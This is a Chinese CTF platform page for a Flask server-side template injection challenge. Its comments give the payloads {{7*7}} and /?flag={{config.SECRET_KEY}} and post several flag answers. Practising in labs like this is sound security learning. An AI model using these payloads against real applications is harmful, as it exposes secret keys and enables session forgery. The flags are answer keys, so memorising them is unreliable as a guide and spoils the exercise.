Simple_SSTI_1WEB 未解决

分数: 5 金币: 2
题目作者: valecalida
一  血: dotast
一血奖励: 2金币
解  决: 28158
提  示:
描  述:
Simple_SSTI_1
评论
HK1ng 1月前

还真是简单模板注入,甚至不需要利用方法,首先传参{{7*7}}验证是否执行了语句,看到页面出现49,就知道这里存在模板注入,然后查看一下配置文件,就发现了flag。{{config}}

回复 0

看writeup刷题 1月前

咋SECRET_KEY还必须大写

回复 0

Wang_Micro 6月前

?flag={{config.SECRET_KEY}} flag{4c1f57d8ba21815847e7d477c3c86b81}

回复 0

超爱西西鸭 8月前

/?flag={{config.SECRET_KEY}}

回复 1

yanglegeyang 8月前

flag{727f54cccaa9c031b1a7c029dd2eb7d8}

回复 0

F0xyear 9月前

不太懂这个漏洞啊,有没有大佬指导一下

回复 1
17856716923 8月前

这个应该要去学下编程语言,模版好像是基于语言的,我去搜了答案都没看懂只能照抄

回复 0

SwanPrincess 9月前

flag{208dea064bf2ad965ef8964289b32005}

回复 0

Mo木潼 9月前

flask模板注入 /?flag={{config.SECRET_KEY}} flag{42d1cb43b082687661fa70767e7348ec}

回复 0

八一卜kod 9月前

-4+2 赔了啊

回复 0

1512405623 9月前

flag{4a5b27a4e8b461441e6d8b7df1573130}

回复 0

WriteUp

image
valecalida

5 金币

评分(49)

解题动态

茉莉清茶 攻破了该题 16小时前
testkuber 攻破了该题 19小时前
蟹堡王第一厨师长 攻破了该题 1天前
2868478493 攻破了该题 2天前
theo1234 攻破了该题 3天前
rep1usone 攻破了该题 4天前
baochaoyaohua 攻破了该题 5天前
clove111 攻破了该题 5天前
DOMAKE 攻破了该题 7天前
gcy111 攻破了该题 7天前
yht111 攻破了该题 7天前
jie123 攻破了该题 8天前
blii 攻破了该题 10天前
ABCDHBY 攻破了该题 11天前
llc123 攻破了该题 12天前
1163064874 攻破了该题 13天前
3268798994 攻破了该题 16天前
peach.peach 攻破了该题 18天前
a5580990 攻破了该题 18天前
2269264191 攻破了该题 21天前
问题反馈